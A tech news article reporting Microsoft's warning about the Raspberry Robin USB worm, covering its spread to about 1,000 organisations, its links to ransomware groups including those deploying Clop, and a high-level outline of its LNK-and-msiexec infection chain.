Microsoft: Raspberry Robin USB worm hits nearly 1,000 organizations in the past month

Widely distributed worm evolves into one of the largest currently active malware distribution platforms.
Written by Liam Tung, Contributing Writer
USB malware
Image: M-A-U / Getty Images

Microsoft is warning that the relatively new Raspberry Robin USB drive worm has triggered payload alerts on nearly 3,000 devices in almost 1,000 organizations in the past 30 days. 

Raspberry Robin malware has previously been seen installed with FakeUpdates malware, which has been linked to the Russian cyber-crime group EvilCorp. Raspberry Robin has also been used to deploy Lockbit ransomware, as well as IcedID, Bumblebee, and Truebot malware. Now, Microsoft has seen it being used to deploy Clop ransomware.

Microsoft attributes Clop deployments connected with the use of Raspberry Robin to a group it tracks as DEV-0950. Its activities overlap with the advanced hacking groups tracked by FireEye as FIN11. The group last year published its victims' data on the Clop ransomware leak site.

"DEV-0950 traditionally uses phishing to acquire the majority of their victims, so this notable shift to using Raspberry Robin enables them to deliver payloads to existing infections and move their campaigns more quickly to ransomware stages," notes the Microsoft Security Threat Intelligence Center (MSTIC).

Also: Ransomware: Why it's still a big threat, and where the gangs are going next

Security firm Red Canary discovered the Raspberry Robin worm in September 2021 and said it was often installed on Windows systems via a USB drive, which contains a LNK shortcut file disguised as a folder. The malware relies on victims inserting a USB drive to run. While autorun of removable media is disabled by default on Windows, Microsoft notes that many organizations enable it through legacy Group Policy changes. 

MSTIC has found that Raspberry Robin relies on both autorun and tricking users into clicking the LINK file. 

"Some Raspberry Robin drives only have the LNK and executable files, while drives from earlier infections have a configured autorun.inf," MSTIC notes.  

This change could explain why the names of the shortcut files changed from more generic names like recovery.lnk to brand names of USB drives. Microsoft suspects this is to encourage a user to execute the LNK file. It also calls on compromised QNAP storage appliances to deliver a malicious payload.    

"Raspberry Robin's LNK file points to cmd.exe to launch the Windows Installer service msiexec.exe and install a malicious payload hosted on compromised QNAP network attached storage (NAS) devices," MSTIC explains. 

As of July, FakeUpdates, a JavaScript backdoor, tapped Raspberry Robin for delivery, adding to malicious ads that were previously used for delivery. 

Also: What, exactly, is cybersecurity? And why does it matter?

Microsoft has found some connections between Raspberry Robin and another piece of malware called Fauppod, which also communicates compromised QNAP appliances. Fauppod is a heavily obfuscated piece of malware written in .NET. Microsoft believes Fauppod is part of the initial method by which Raspberry Robin infects machines.

"Based on our investigation, Microsoft currently assesses with medium confidence that the above .NET DLLs delivered both by Raspberry Robin LNK infections and Fauppod CPL samples are responsible for spreading Raspberry Robin LNK files to USB drives. These LNK files, in turn, infect other hosts via the infection chain detailed in Red Canary's blog."

"Microsoft also assesses with medium confidence that the Fauppod-packed CPL samples are currently the earliest known point in the attack chain for propagating Raspberry Robin infections to targets. Microsoft findings suggest that the Fauppod CPL entities, the obfuscated .NET LNK spreader modules they drop, the Raspberry Robin LNK files Red Canary documented, and the Raspberry Robin DLL files (or, Roshtyak, as per Avast) could all be considered as various components to the "Raspberry Robin" malware infection chain."

Microsoft also backed up IBM's previous assertion that Fauppod was linked to the notorious Dridex banking trojan.

Editorial standards